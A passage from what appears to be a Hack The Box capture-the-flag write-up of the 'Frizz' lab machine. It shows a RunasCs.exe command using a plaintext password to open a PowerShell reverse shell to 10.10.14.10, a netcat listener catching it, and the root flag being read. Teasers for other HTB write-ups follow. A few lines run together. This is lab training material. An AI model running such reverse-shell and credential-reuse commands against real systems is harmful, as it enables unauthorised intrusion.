.\RunasCs.exe "M.SchoolBus" '!suBcig@MehTed!R' powershell.exe -r 10.10.14.10:80sh
lwrap nc -lvnp 80
retrying local 0.0.0.0:80 : Address already in use
retrying local 0.0.0.0:80 : Address already in use
listening on [any] 80 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.11.60] 60728
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Windows\system32> whoami
whoami
frizz\m.schoolbusroot.txt
sh
PS C:\users\Administrator\Desktop> cat root.txt
cat root.txt
7d5d148d...Up next
EasyMar 2025
HTB — Code
Python code sandbox escape via restricted eval bypass reads SSH keys. Root via path traversal in the backy backup tool.
Read writeup
EasyMay 2025
HTB — Puppy
AD enumeration with BloodHound reveals a password reset path. HR share credential reuse and GenericWrite abuse to reach Domain Admin.
Read writeup
EasyMay 2025
HTB — Nocturnal
ISP file manager path traversal leaks app config with credentials. ISPConfig adduser API abuse leads to root.
Read writeup